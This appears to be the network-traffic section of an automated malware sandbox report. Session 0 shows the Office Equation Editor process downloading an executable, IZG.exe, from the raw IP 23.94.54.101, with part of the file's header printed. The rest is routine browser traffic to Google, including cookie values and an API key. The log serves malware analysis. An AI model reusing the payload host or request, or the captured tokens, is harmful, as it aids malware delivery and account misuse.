May 2, 2024 04:59:50.897983074 CEST    49170  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:50.911315918 CEST    49170  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:50.911336899 CEST    443    49170  172.217.1.4   192.168.2.22
May 2, 2024 04:59:50.940943003 CEST    443    49168  172.217.1.4   192.168.2.22
May 2, 2024 04:59:50.961393118 CEST    49171  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:50.961431026 CEST    443    49171  172.217.1.4   192.168.2.22
May 2, 2024 04:59:50.961482048 CEST    49171  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:50.963440895 CEST    49168  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:50.963454008 CEST    443    49168  172.217.1.4   192.168.2.22
May 2, 2024 04:59:50.963619947 CEST    49171  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:50.963632107 CEST    443    49171  172.217.1.4   192.168.2.22
May 2, 2024 04:59:50.964951992 CEST    443    49168  172.217.1.4   192.168.2.22
May 2, 2024 04:59:50.965022087 CEST    49168  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:50.970653057 CEST    49168  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:50.970731020 CEST    443    49168  172.217.1.4   192.168.2.22
May 2, 2024 04:59:50.970906973 CEST    49168  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:50.970913887 CEST    443    49168  172.217.1.4   192.168.2.22
May 2, 2024 04:59:51.040369034 CEST    443    49169  172.217.1.4   192.168.2.22
May 2, 2024 04:59:51.091835022 CEST    49169  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:51.091871023 CEST    443    49169  172.217.1.4   192.168.2.22
May 2, 2024 04:59:51.092952967 CEST    443    49169  172.217.1.4   192.168.2.22
May 2, 2024 04:59:51.093023062 CEST    49169  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:51.113409042 CEST    49169  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:51.113512993 CEST    443    49169  172.217.1.4   192.168.2.22
May 2, 2024 04:59:51.118195057 CEST    49169  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:51.118213892 CEST    443    49169  172.217.1.4   192.168.2.22
May 2, 2024 04:59:51.140897989 CEST    443    49170  172.217.1.4   192.168.2.22
May 2, 2024 04:59:51.147558928 CEST    49170  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:51.147568941 CEST    443    49170  172.217.1.4   192.168.2.22
May 2, 2024 04:59:51.149044991 CEST    443    49170  172.217.1.4   192.168.2.22
May 2, 2024 04:59:51.149117947 CEST    49170  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:51.176120043 CEST    443    49168  172.217.1.4   192.168.2.22
May 2, 2024 04:59:51.176222086 CEST    49168  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:51.183875084 CEST    49170  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:51.184003115 CEST    443    49170  172.217.1.4   192.168.2.22
May 2, 2024 04:59:51.184052944 CEST    49170  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:51.193147898 CEST    443    49168  172.217.1.4   192.168.2.22
May 2, 2024 04:59:51.193928003 CEST    443    49171  172.217.1.4   192.168.2.22
May 2, 2024 04:59:51.194540977 CEST    443    49168  172.217.1.4   192.168.2.22
May 2, 2024 04:59:51.194595098 CEST    49168  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:51.224118948 CEST    443    49170  172.217.1.4   192.168.2.22
May 2, 2024 04:59:51.305769920 CEST    49171  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:51.305814981 CEST    443    49171  172.217.1.4   192.168.2.22
May 2, 2024 04:59:51.307123899 CEST    443    49171  172.217.1.4   192.168.2.22
May 2, 2024 04:59:51.307142019 CEST    443    49171  172.217.1.4   192.168.2.22
May 2, 2024 04:59:51.307188988 CEST    49171  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:51.314488888 CEST    49168  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:51.314517975 CEST    443    49168  172.217.1.4   192.168.2.22
May 2, 2024 04:59:51.320547104 CEST    49171  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:51.320628881 CEST    443    49171  172.217.1.4   192.168.2.22
May 2, 2024 04:59:51.320698977 CEST    49171  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:51.320714951 CEST    443    49171  172.217.1.4   192.168.2.22
May 2, 2024 04:59:51.332118988 CEST    443    49169  172.217.1.4   192.168.2.22
May 2, 2024 04:59:51.332174063 CEST    49169  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:51.388123035 CEST    443    49170  172.217.1.4   192.168.2.22
May 2, 2024 04:59:51.388184071 CEST    49170  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:51.540121078 CEST    443    49171  172.217.1.4   192.168.2.22
May 2, 2024 04:59:51.540182114 CEST    49171  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:51.614763021 CEST    443    49169  172.217.1.4   192.168.2.22
May 2, 2024 04:59:51.614880085 CEST    443    49169  172.217.1.4   192.168.2.22
May 2, 2024 04:59:51.614881039 CEST    49169  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:51.614916086 CEST    49169  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:51.623307943 CEST    49169  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:51.623337030 CEST    443    49169  172.217.1.4   192.168.2.22
May 2, 2024 04:59:51.627840996 CEST    49172  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:51.627883911 CEST    443    49172  172.217.1.4   192.168.2.22
May 2, 2024 04:59:51.627928972 CEST    49172  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:51.628304005 CEST    49172  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:51.628325939 CEST    443    49172  172.217.1.4   192.168.2.22
May 2, 2024 04:59:51.649424076 CEST    443    49170  172.217.1.4   192.168.2.22
May 2, 2024 04:59:51.649512053 CEST    49170  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:51.649542093 CEST    443    49170  172.217.1.4   192.168.2.22
May 2, 2024 04:59:51.649609089 CEST    443    49170  172.217.1.4   192.168.2.22
May 2, 2024 04:59:51.649663925 CEST    49170  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:51.656564951 CEST    49170  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:51.656589031 CEST    443    49170  172.217.1.4   192.168.2.22
May 2, 2024 04:59:51.667517900 CEST    49173  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:51.667552948 CEST    443    49173  172.217.1.4   192.168.2.22
May 2, 2024 04:59:51.667614937 CEST    49173  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:51.667836905 CEST    49173  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:51.667851925 CEST    443    49173  172.217.1.4   192.168.2.22
May 2, 2024 04:59:51.782639027 CEST    443    49171  172.217.1.4   192.168.2.22
May 2, 2024 04:59:51.782706022 CEST    49171  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:51.782727957 CEST    443    49171  172.217.1.4   192.168.2.22
May 2, 2024 04:59:51.782782078 CEST    443    49171  172.217.1.4   192.168.2.22
May 2, 2024 04:59:51.782819986 CEST    49171  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:51.783549070 CEST    49171  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:51.783566952 CEST    443    49171  172.217.1.4   192.168.2.22
May 2, 2024 04:59:51.784476995 CEST    49174  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:51.784513950 CEST    443    49174  172.217.1.4   192.168.2.22
May 2, 2024 04:59:51.784562111 CEST    49174  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:51.784810066 CEST    49174  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:51.784822941 CEST    443    49174  172.217.1.4   192.168.2.22
May 2, 2024 04:59:51.864357948 CEST    443    49172  172.217.1.4   192.168.2.22
May 2, 2024 04:59:51.864639044 CEST    49172  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:51.864659071 CEST    443    49172  172.217.1.4   192.168.2.22
May 2, 2024 04:59:51.864948988 CEST    443    49172  172.217.1.4   192.168.2.22
May 2, 2024 04:59:51.865376949 CEST    49172  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:51.865433931 CEST    443    49172  172.217.1.4   192.168.2.22
May 2, 2024 04:59:51.865535975 CEST    49172  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:51.897337914 CEST    443    49173  172.217.1.4   192.168.2.22
May 2, 2024 04:59:51.898384094 CEST    49173  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:51.898407936 CEST    443    49173  172.217.1.4   192.168.2.22
May 2, 2024 04:59:51.898756981 CEST    443    49173  172.217.1.4   192.168.2.22
May 2, 2024 04:59:51.900075912 CEST    49173  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:51.900150061 CEST    443    49173  172.217.1.4   192.168.2.22
May 2, 2024 04:59:51.900280952 CEST    49173  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:51.908119917 CEST    443    49172  172.217.1.4   192.168.2.22
May 2, 2024 04:59:51.944116116 CEST    443    49173  172.217.1.4   192.168.2.22
May 2, 2024 04:59:52.013046980 CEST    443    49174  172.217.1.4   192.168.2.22
May 2, 2024 04:59:52.017291069 CEST    49175  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:52.017333031 CEST    443    49175  172.217.1.4   192.168.2.22
May 2, 2024 04:59:52.017401934 CEST    49175  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:52.026449919 CEST    49174  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:52.026474953 CEST    443    49174  172.217.1.4   192.168.2.22
May 2, 2024 04:59:52.026890993 CEST    49175  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:52.026921988 CEST    443    49175  172.217.1.4   192.168.2.22
May 2, 2024 04:59:52.027501106 CEST    443    49174  172.217.1.4   192.168.2.22
May 2, 2024 04:59:52.027566910 CEST    49174  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:52.033283949 CEST    49174  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:52.033359051 CEST    443    49174  172.217.1.4   192.168.2.22
May 2, 2024 04:59:52.033505917 CEST    49174  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:52.033515930 CEST    443    49174  172.217.1.4   192.168.2.22
May 2, 2024 04:59:52.100049019 CEST    443    49172  172.217.1.4   192.168.2.22
May 2, 2024 04:59:52.100089073 CEST    443    49172  172.217.1.4   192.168.2.22
May 2, 2024 04:59:52.100123882 CEST    49172  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:52.100145102 CEST    443    49172  172.217.1.4   192.168.2.22
May 2, 2024 04:59:52.100219965 CEST    443    49172  172.217.1.4   192.168.2.22
May 2, 2024 04:59:52.100255966 CEST    49172  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:52.103131056 CEST    49172  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:52.103147030 CEST    443    49172  172.217.1.4   192.168.2.22
May 2, 2024 04:59:52.129611015 CEST    443    49173  172.217.1.4   192.168.2.22
May 2, 2024 04:59:52.129651070 CEST    443    49173  172.217.1.4   192.168.2.22
May 2, 2024 04:59:52.129689932 CEST    443    49173  172.217.1.4   192.168.2.22
May 2, 2024 04:59:52.129712105 CEST    49173  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:52.129738092 CEST    443    49173  172.217.1.4   192.168.2.22
May 2, 2024 04:59:52.129754066 CEST    443    49173  172.217.1.4   192.168.2.22
May 2, 2024 04:59:52.129772902 CEST    49173  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:52.129807949 CEST    49173  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:52.145447969 CEST    49176  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:52.145479918 CEST    443    49176  172.217.1.4   192.168.2.22
May 2, 2024 04:59:52.145526886 CEST    49176  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:52.212843895 CEST    49176  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:52.212858915 CEST    443    49176  172.217.1.4   192.168.2.22
May 2, 2024 04:59:52.216456890 CEST    49173  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:52.216492891 CEST    443    49173  172.217.1.4   192.168.2.22
May 2, 2024 04:59:52.244118929 CEST    443    49174  172.217.1.4   192.168.2.22
May 2, 2024 04:59:52.244187117 CEST    49174  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:52.245626926 CEST    49174  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:52.245706081 CEST    443    49174  172.217.1.4   192.168.2.22
May 2, 2024 04:59:52.245760918 CEST    49174  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:52.246733904 CEST    49177  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:52.246769905 CEST    443    49177  172.217.1.4   192.168.2.22
May 2, 2024 04:59:52.246814966 CEST    49177  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:52.249026060 CEST    49177  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:52.249037981 CEST    443    49177  172.217.1.4   192.168.2.22
May 2, 2024 04:59:52.254282951 CEST    443    49175  172.217.1.4   192.168.2.22
May 2, 2024 04:59:52.258013964 CEST    49175  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:52.258038044 CEST    443    49175  172.217.1.4   192.168.2.22
May 2, 2024 04:59:52.258322954 CEST    443    49175  172.217.1.4   192.168.2.22
May 2, 2024 04:59:52.258981943 CEST    49175  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:52.259028912 CEST    443    49175  172.217.1.4   192.168.2.22
May 2, 2024 04:59:52.259279966 CEST    49175  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:52.304116964 CEST    443    49175  172.217.1.4   192.168.2.22
May 2, 2024 04:59:52.447061062 CEST    443    49176  172.217.1.4   192.168.2.22
May 2, 2024 04:59:52.448285103 CEST    49176  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:52.448292017 CEST    443    49176  172.217.1.4   192.168.2.22
May 2, 2024 04:59:52.449131966 CEST    443    49176  172.217.1.4   192.168.2.22
May 2, 2024 04:59:52.449179888 CEST    49176  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:52.450447083 CEST    49176  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:52.450484037 CEST    443    49176  172.217.1.4   192.168.2.22
May 2, 2024 04:59:52.451031923 CEST    49176  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:52.451035976 CEST    443    49176  172.217.1.4   192.168.2.22
May 2, 2024 04:59:52.477972984 CEST    443    49177  172.217.1.4   192.168.2.22
May 2, 2024 04:59:52.478605032 CEST    49177  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:52.478626013 CEST    443    49177  172.217.1.4   192.168.2.22
May 2, 2024 04:59:52.478914022 CEST    443    49177  172.217.1.4   192.168.2.22
May 2, 2024 04:59:52.486345053 CEST    49177  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:52.486408949 CEST    443    49177  172.217.1.4   192.168.2.22
May 2, 2024 04:59:52.486888885 CEST    49177  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:52.510191917 CEST    443    49175  172.217.1.4   192.168.2.22
May 2, 2024 04:59:52.510227919 CEST    443    49175  172.217.1.4   192.168.2.22
May 2, 2024 04:59:52.510297060 CEST    49175  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:52.510320902 CEST    443    49175  172.217.1.4   192.168.2.22
May 2, 2024 04:59:52.513345957 CEST    443    49175  172.217.1.4   192.168.2.22
May 2, 2024 04:59:52.513386011 CEST    49175  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:52.513391972 CEST    443    49175  172.217.1.4   192.168.2.22
May 2, 2024 04:59:52.514183998 CEST    443    49175  172.217.1.4   192.168.2.22
May 2, 2024 04:59:52.514224052 CEST    49175  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:52.532108068 CEST    443    49177  172.217.1.4   192.168.2.22
May 2, 2024 04:59:52.599395037 CEST    49175  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:52.599423885 CEST    443    49175  172.217.1.4   192.168.2.22
May 2, 2024 04:59:52.660116911 CEST    443    49176  172.217.1.4   192.168.2.22
May 2, 2024 04:59:52.660196066 CEST    49176  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:53.194005966 CEST    443    49176  172.217.1.4   192.168.2.22
May 2, 2024 04:59:53.194123030 CEST    443    49176  172.217.1.4   192.168.2.22
May 2, 2024 04:59:53.195307016 CEST    49176  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:53.196683884 CEST    443    49177  172.217.1.4   192.168.2.22
May 2, 2024 04:59:53.196840048 CEST    443    49177  172.217.1.4   192.168.2.22
May 2, 2024 04:59:53.196912050 CEST    49177  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:53.211838007 CEST    49176  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:53.211853981 CEST    443    49176  172.217.1.4   192.168.2.22
May 2, 2024 04:59:53.212193966 CEST    49177  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:53.212213993 CEST    443    49177  172.217.1.4   192.168.2.22
May 2, 2024 04:59:53.213213921 CEST    49179  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:53.213258982 CEST    443    49179  172.217.1.4   192.168.2.22
May 2, 2024 04:59:53.213308096 CEST    49179  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:53.213978052 CEST    49179  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:53.213993073 CEST    443    49179  172.217.1.4   192.168.2.22
May 2, 2024 04:59:53.214605093 CEST    49180  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:53.214643002 CEST    443    49180  172.217.1.4   192.168.2.22
May 2, 2024 04:59:53.214725018 CEST    49180  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:53.215142965 CEST    49180  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:53.215172052 CEST    443    49180  172.217.1.4   192.168.2.22
May 2, 2024 04:59:53.443661928 CEST    443    49179  172.217.1.4   192.168.2.22
May 2, 2024 04:59:53.444418907 CEST    49179  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:53.444437981 CEST    443    49179  172.217.1.4   192.168.2.22
May 2, 2024 04:59:53.444788933 CEST    443    49179  172.217.1.4   192.168.2.22
May 2, 2024 04:59:53.444926977 CEST    443    49180  172.217.1.4   192.168.2.22
May 2, 2024 04:59:53.445286989 CEST    49179  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:53.445352077 CEST    443    49179  172.217.1.4   192.168.2.22
May 2, 2024 04:59:53.445472002 CEST    49180  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:53.445496082 CEST    443    49180  172.217.1.4   192.168.2.22
May 2, 2024 04:59:53.445755959 CEST    49179  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:53.445825100 CEST    443    49180  172.217.1.4   192.168.2.22
May 2, 2024 04:59:53.446217060 CEST    49180  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:53.446281910 CEST    443    49180  172.217.1.4   192.168.2.22
May 2, 2024 04:59:53.446430922 CEST    49180  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:53.488120079 CEST    443    49180  172.217.1.4   192.168.2.22
May 2, 2024 04:59:53.492114067 CEST    443    49179  172.217.1.4   192.168.2.22
May 2, 2024 04:59:53.675393105 CEST    443    49179  172.217.1.4   192.168.2.22
May 2, 2024 04:59:53.675431967 CEST    443    49179  172.217.1.4   192.168.2.22
May 2, 2024 04:59:53.675472975 CEST    443    49179  172.217.1.4   192.168.2.22
May 2, 2024 04:59:53.675515890 CEST    49179  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:53.675528049 CEST    443    49179  172.217.1.4   192.168.2.22
May 2, 2024 04:59:53.675571918 CEST    49179  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:53.676451921 CEST    49179  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:53.676465988 CEST    443    49179  172.217.1.4   192.168.2.22
May 2, 2024 04:59:53.677508116 CEST    443    49180  172.217.1.4   192.168.2.22
May 2, 2024 04:59:53.677546978 CEST    443    49180  172.217.1.4   192.168.2.22
May 2, 2024 04:59:53.677573919 CEST    443    49180  172.217.1.4   192.168.2.22
May 2, 2024 04:59:53.677613020 CEST    49180  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:53.677638054 CEST    443    49180  172.217.1.4   192.168.2.22
May 2, 2024 04:59:53.677989006 CEST    49180  443    192.168.2.22  172.217.1.4
May 2, 2024 04:59:53.678023100 CEST    443    49180  172.217.1.4   192.168.2.22
May 2, 2024 04:59:53.678071976 CEST    49180  443    192.168.2.22  172.217.1.4
Timestamp                              Source Port  Dest Port  Source IP     Dest IP
May 2, 2024 04:59:47.543797970 CEST    52917        53         192.168.2.22  8.8.8.8
May 2, 2024 04:59:47.545480967 CEST    62751        53         192.168.2.22  8.8.8.8
May 2, 2024 04:59:47.636168957 CEST    53           62751      8.8.8.8       192.168.2.22
May 2, 2024 04:59:47.640117884 CEST    53           52917      8.8.8.8       192.168.2.22
May 2, 2024 04:59:47.643583059 CEST    53           54821      8.8.8.8       192.168.2.22
May 2, 2024 04:59:47.802365065 CEST    53           49881      8.8.8.8       192.168.2.22
May 2, 2024 04:59:50.454046011 CEST    65510        53         192.168.2.22  8.8.8.8
May 2, 2024 04:59:50.493869066 CEST    62672        53         192.168.2.22  8.8.8.8
May 2, 2024 04:59:50.550714016 CEST    53           65510      8.8.8.8       192.168.2.22
May 2, 2024 04:59:50.586508989 CEST    53           62672      8.8.8.8       192.168.2.22
May 2, 2024 04:59:50.856822968 CEST    53           49384      8.8.8.8       192.168.2.22
May 2, 2024 05:00:07.904285908 CEST    53           50568      8.8.8.8       192.168.2.22
May 2, 2024 05:00:15.793735981 CEST    53           56329      8.8.8.8       192.168.2.22
May 2, 2024 05:00:26.391371012 CEST    53           51870      8.8.8.8       192.168.2.22
                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                    May 2, 2024 04:59:47.543797970 CEST192.168.2.228.8.8.80x44dfStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                    May 2, 2024 04:59:47.545480967 CEST192.168.2.228.8.8.80xe54fStandard query (0)www.google.com65IN (0x0001)false
                                                                    May 2, 2024 04:59:50.454046011 CEST192.168.2.228.8.8.80x249aStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                    May 2, 2024 04:59:50.493869066 CEST192.168.2.228.8.8.80x350aStandard query (0)www.google.com65IN (0x0001)false
                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                    May 2, 2024 04:59:47.636168957 CEST8.8.8.8192.168.2.220xe54fNo error (0)www.google.com65IN (0x0001)false
                                                                    May 2, 2024 04:59:47.640117884 CEST8.8.8.8192.168.2.220x44dfNo error (0)www.google.com172.217.1.4A (IP address)IN (0x0001)false
                                                                    May 2, 2024 04:59:50.550714016 CEST8.8.8.8192.168.2.220x249aNo error (0)www.google.com172.217.1.4A (IP address)IN (0x0001)false
                                                                    May 2, 2024 04:59:50.586508989 CEST8.8.8.8192.168.2.220x350aNo error (0)www.google.com65IN (0x0001)false
                                                                    • www.google.com
                                                                    • 23.94.54.101
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.22 | 49163 | 23.94.54.101 | 80 | 2060 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp | Bytes transferred | Direction | Data
May 2, 2024 04:59:07.767561913 CEST | 69 | OUT | GET /IZG.exe HTTP/1.1
Connection: Keep-Alive
Host: 23.94.54.101
May 2, 2024 04:59:07.877931118 CEST | 1289 | IN | HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Wed, 01 May 2024 18:27:08 GMT
Accept-Ranges: bytes
ETag: "56802d2df59bda1:0"
Server: Microsoft-IIS/8.5
Date: Thu, 02 May 2024 02:59:07 GMT
Content-Length: 1287680
                                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 cb fc 31 66 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 f6 09 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 [TRUNCATED]
                                                                    Data Ascii: MZ@ !L!This program cannot be run in DOS mode.$j:j:Cj:@*n~{{{z{RichPEL1f"w@*@@@d|@:u4@.text `.rdata@@.datalpH@.rsrc:@<@@.relocuv0@B [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.22 | 49164 | 172.217.1.4 | 443 | 1776 | C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

Timestamp | Bytes transferred | Direction | Data
2024-05-02 02:59:47 UTC | 330 | OUT | GET /chrome/whats-new/m109?internal=true HTTP/1.1
Host: www.google.com
Connection: keep-alive
Sec-Fetch-Site: none
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
2024-05-02 02:59:48 UTC | 686 | IN | HTTP/1.1 404 Not Found
Cross-Origin-Resource-Policy: cross-origin
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Accept-CH: Sec-Ch-Ua-Full-Version-List, Sec-Ch-Ua-Platform, Sec-Ch-Ua-Platform-Version, Sec-CH-Prefers-Reduced-Motion
Critical-CH: Sec-Ch-Ua-Full-Version-List, Sec-Ch-Ua-Platform, Sec-Ch-Ua-Platform-Version, Sec-CH-Prefers-Reduced-Motion
Vary: Accept-Encoding, Sec-Ch-Ua-Full-Version-List, Sec-Ch-Ua-Platform, Sec-Ch-Ua-Platform-Version, Sec-CH-Prefers-Reduced-Motion
Date: Thu, 02 May 2024 02:59:48 GMT
Server: sffe
Content-Length: 187622
X-XSS-Protection: 0
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.22 | 49168 | 172.217.1.4 | 443 | 1776 | C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

Timestamp | Bytes transferred | Direction | Data
2024-05-02 02:59:50 UTC | 837 | OUT | GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
Host: www.google.com
Connection: keep-alive
X-Client-Data: CIa2yQEIorbJAQipncoBCKj3ygEIk6HLAQiFoM0BCNy9zQEIuMjNAQ==
Sec-Fetch-Site: none
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: CONSENT=PENDING+962; SOCS=CAESHAgCEhJnd3NfMjAyMzA4MDEtMF9SQzMaAmVuIAEaBgiAi8amBg; __Secure-ENID=14.SE=LM-NkPAvbCtuNhK73uRS1U27fKMegq7R6_Ue_GnOGI1dekNKandC6Dto1fKS9ocnnyUmf2MAXGM269U9HhkgndYLxWy3FrZaGzh_yODdv1ouU12fBCNmRhMUwM3dzKbRlYRnbKhIQz9fV5WGdCRRjXQx5RGii6FbIw100Hc46oWQ6bysmy2hqA
2024-05-02 02:59:51 UTC | 1191 | IN | HTTP/1.1 200 OK
Date: Thu, 02 May 2024 02:59:51 GMT
Pragma: no-cache
Expires: -1
Cache-Control: no-cache, must-revalidate
Content-Type: text/javascript; charset=UTF-8
Strict-Transport-Security: max-age=31536000
Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-IoSY7IUYzIU_ww8fVz8O9Q' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
